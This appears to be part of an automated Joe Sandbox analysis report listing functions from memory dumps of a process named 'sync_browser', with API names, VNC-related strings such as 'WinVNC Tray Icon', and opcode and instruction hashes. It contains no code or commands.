                                                                                          • Instruction Fuzzy Hash: 7331C223B29B4285FB54DB6AF4543296791EFA5B44F044138EA4E873E5EF3ED448C350

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessWindow$CurrentFindMessagePostThread
                                                                                          • String ID: WinVNC Tray Icon
                                                                                          • API String ID: 2660421340-1071638575
                                                                                          • Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                                          • Instruction ID: 8a71e9ca9fd8dd6217ec35e6095cf05d52864f646cd770efc4db33ae88f5fb53
                                                                                          • Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                                          • Instruction Fuzzy Hash: A4018622A18B8181E7049F96B8544A6F764FF58BD4F544036FE4E87B65DE3CD489C700
                                                                                          APIs
                                                                                          Strings
                                                                                          • vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF67E7E3490
                                                                                          • vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF67E7E3429
                                                                                          • vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF67E7E3502
                                                                                          • vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF67E7E33D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast
                                                                                          • String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
                                                                                          • API String ID: 1452528299-2001727811
                                                                                          • Opcode ID: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                                                          • Instruction ID: 824ebceff60d280c24bb56946e6e129e07af2b5729f9c875cbc96997eae78df3
                                                                                          • Opcode Fuzzy Hash: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                                                          • Instruction Fuzzy Hash: 21410867A15B4291EB818F26D4883FC27A5EBA4F48F588072DE0D8B7A4DF3DD489C310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
                                                                                          • String ID: <unavailable>
                                                                                          • API String ID: 4131039871-1096956887
                                                                                          • Opcode ID: ff450a747a61d37f55c44f9c17d51056de1f571cc6db6c55958413c7f3242baf
                                                                                          • Instruction ID: 98243f43cfd32d06a3523627d9beb74afdf58b10796eabb6ddf09bef67d8580d
                                                                                          • Opcode Fuzzy Hash: ff450a747a61d37f55c44f9c17d51056de1f571cc6db6c55958413c7f3242baf
                                                                                          • Instruction Fuzzy Hash: EB314B33A29F81C2E7548F64E8443A9B3A4FB98B94F140135EA9D8B7A4DF3DD459C740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: connectgethostbynamehtonsinet_addr
                                                                                          • String ID:
                                                                                          • API String ID: 599670773-0
                                                                                          • Opcode ID: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
                                                                                          • Instruction ID: a62ea1ca160ecba8b250faa43441db8d7183be6f194da7b4bae7d5d7cc171c15
                                                                                          • Opcode Fuzzy Hash: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
                                                                                          • Instruction Fuzzy Hash: B6118663A28A4186EB659B25E840339B7A4FFA8B95F004235FE5EC7794DF3CD544C704
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _callnewh_errno$AllocHeapmalloc
                                                                                          • String ID: bad allocation
                                                                                          • API String ID: 3727741168-2104205924
                                                                                          • Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                                                          • Instruction ID: cebfe6409e5de3d2a4e57928c6f63101d3bad5db1b9c8bd8e0603ad27eba96ce
                                                                                          • Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                                                          • Instruction Fuzzy Hash: D9010C67F3974795EA10EB90E8401B8A3A0BF78381F541135F98DC66A2EE7DE54CC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FindMessagePostWindow
                                                                                          • String ID: WinVNC Tray Icon
                                                                                          • API String ID: 2578315405-1071638575
                                                                                          • Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                                                          • Instruction ID: a4679c82f76ecde7aaf22bb526eff6122728e99ca192beb3b614b1e1fc01396b
                                                                                          • Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                                                          • Instruction Fuzzy Hash: D9018423E3864181EB54CB46F44426AA294FFA8BD8F485072FE5E87759DE7CD8998B00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: closesocketshutdown
                                                                                          • String ID: vsocket.cpp : closing socket
                                                                                          • API String ID: 572888783-2569437896
                                                                                          • Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                                                          • Instruction ID: ccd4c9a1de0c5081b68152c765ce89a229e7def7c701f887798dcd83a7f10840
                                                                                          • Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                                                          • Instruction Fuzzy Hash: 47F03776A20A4182EB159F74C4942A87325FFA8B15F244635E92E86295DF3CD459C340
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: selectsend
                                                                                          • String ID:
                                                                                          • API String ID: 2999949978-0
                                                                                          • Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                                                          • Instruction ID: 6943e49e28e1093160f7c4fd199a5ce76b17605bbba1bc61fd122001186f87cc
                                                                                          • Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                                                          • Instruction Fuzzy Hash: 87312923A38E8246EAA18B15A8447BAE794FFB5758F141130FD4D83AD1DF3DD4498600
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocHeap_callnewh_errno
                                                                                          • String ID:
                                                                                          • API String ID: 849339952-0
                                                                                          • Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                                                          • Instruction ID: d36c855a7642f3aef01d8adab0d07a647617e089a8ab95d4db4856d08eac8167
                                                                                          • Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                                                          • Instruction Fuzzy Hash: 96115223B3D24289FA5A4B59D644779F2959FA47A4F088A30FD2DC6AD4DF6CB4488300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeLibraryMessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3583424976-0
                                                                                          • Opcode ID: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
                                                                                          • Instruction ID: e29f457b56b8f697d946af79174f4569af55500f9d03ecb0e4e0cabc5c9b5445
                                                                                          • Opcode Fuzzy Hash: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
                                                                                          • Instruction Fuzzy Hash: A6113C2BF2E54295FF59DFA1C4626785354AFB8B44F1805B1EE0E82A81DF3EE848C311
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: closesocketsetsockoptshutdownsocket
                                                                                          • String ID:
                                                                                          • API String ID: 3513852771-0
                                                                                          • Opcode ID: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
                                                                                          • Instruction ID: 89d8775372346dc2dbf861d691dffc457882aa0dc0377bdac3f39768724debc5
                                                                                          • Opcode Fuzzy Hash: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
                                                                                          • Instruction Fuzzy Hash: 2FF0CDB3A3820387FB209F24D8003B5A364AF60704F240634EA58C66D0DF7ED1898A40
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: setsockopt
                                                                                          • String ID:
                                                                                          • API String ID: 3981526788-0
                                                                                          • Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                                                          • Instruction ID: a6e9138c06de63b872fbb3adca8421d68fb18b18d05bdcc02f3d2cf6a5d79852
                                                                                          • Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                                                          • Instruction Fuzzy Hash: 8AF06262A2418253F7228F64D4442B5E751FB94715F140A31EAADCAAD4CFBCC19E8B00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountTickselect
                                                                                          • String ID:
                                                                                          • API String ID: 2475007269-0
                                                                                          • Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                                                          • Instruction ID: 4949d0341f298d3cac815879cc0653638e716cfe6744cb8d18452b28ec043ec7
                                                                                          • Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                                                          • Instruction Fuzzy Hash: 2031947371468187EB04CF21D5442ED7B51E7A8B84F1A8039DF098B789DF3DE5498750
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(?,?,?,00007FF67E8837F7,?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19), ref: 00007FF67E883331
                                                                                          Memory Dump Source
